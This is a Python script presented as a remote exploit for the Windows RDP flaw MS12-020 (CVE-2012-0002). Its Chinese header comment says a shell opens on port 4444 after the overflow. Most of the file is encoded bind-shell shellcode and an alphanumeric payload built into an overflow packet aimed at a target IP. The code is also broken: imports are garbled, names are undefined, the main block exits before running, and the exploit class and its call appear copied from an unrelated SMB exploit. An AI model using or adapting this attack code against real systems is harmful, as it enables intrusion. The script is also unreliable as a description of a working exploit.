MS12-020(CVE-2012-0002) exp

1. #需要linux python+freerdp环境，溢出成功后telnet ip -port 4444 或者你自己修改shellcode吧，exp仅供参考
   #!/usr/bin/env python
2. #############################################################################
3. #   MS12-020 Exploit
4. #
5. #   Uses FreeRDP
6. #############################################################################
7.  
8. importstruct
9. importsys
10. from freerdp import rdpRdp
11. from freerdp import crypto
12. from freerdp.rdpRdpimport  rdpNego
13.  
14. #bind shellcode TCP port 4444
15. shellcode  ='\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
16. shellcode +='\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
17. shellcode +='\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
18. shellcode +='\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
19. shellcode +='\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
20. shellcode +='\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
21. shellcode +='\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
22. shellcode +='\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
23. shellcode +='\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
24. shellcode +='\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
25. shellcode +='\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
26. shellcode +='\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
27. shellcode +='\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
28. shellcode +='\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
29. shellcode +='\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
30. shellcode +='\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
31. shellcode +='\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
32. shellcode +='\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
33. shellcode +='\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
34. shellcode +='\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
35. shellcode +='\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
36. shellcode +='\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
37. shellcode +='\xba\xb5\x60\x56\x39\x4a\xb6\xa9'
38.  
39. #Payload
40. payload  ='\x41\x00\x5c\x00'
41. payload +='\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
42. payload +='\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
43. payload +='\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
44. payload +='\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
45. payload +='\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
46. payload +='\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
47. payload +='\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
48. payload +='\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
49. payload +='\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
50. payload +='\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
51. payload +='\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
52. payload +='\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
53. payload +='\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
54. payload +='\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
55. payload +='\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
56. payload +='\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
57. payload +='\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
58. payload +='\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
59. payload +='\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
60. payload +='\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
61. payload +='\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
62. payload +='\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
63. payload +='\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
64. payload +='\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
65. payload +='\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
66. payload +='\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
67. payload +='\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
68. payload +='\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
69. payload +='\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
70. payload +='\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
71. payload +='\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
72. payload +='\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
73. payload +='\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
74. payload +='\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
75. payload +='\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
76. payload +='\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
77. payload +='\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
78. payload +='\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
79. payload +='\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
80. payload +='\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
81. payload +='\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
82. payload +='\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
83. payload +='\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
84. payload +='\x4f\x69\x46\x4b\x4f\x6e\x30\x68';
85.  
86. class SRVSVC_Exploit(Thread):
87.     def__init__(self, target, port=3389):
88.         super(SRVSVC_Exploit,self).__init__()
89.         self.__port   = port
90.         self.target   = target
91.  
92.     def __DCEPacket(self):
93.         print'[-]Connecting'
94.         self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
95.         self.__trans.connect()
96.         print'[-]connected' % self.target
97.  
98.         # Making teh packet
99.         self.__stub='\x01\x00\x00\x00'
100.         self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
101.         self.__stub+=shellcode
102.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
103.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
104.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
105.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
106.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
107.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
108.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
109.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
110.         self.__stub+='\x00\x00\x00\x00'
111.         self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
112.         self.__stub+=payload
113.         self.__stub+='\x00\x00\x00\x00'
114.         self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
115.         self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
116.         self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
117.         self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
118.         return
119.  
120.     def run(self):
121.         self.__DCEPacket()
122.         self.__dce.call(0x1f,self.__stub)
123.         print'[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'
124.  
125. if __name__ =='__main__':
126.         target =sys.argv[1]
127.         print'\nUsage: %s <target ip> \n' % sys.argv[0]
128.         sys.exit(-1)
129.  
130. current = SRVSVC_Exploit(target)
131. current.start()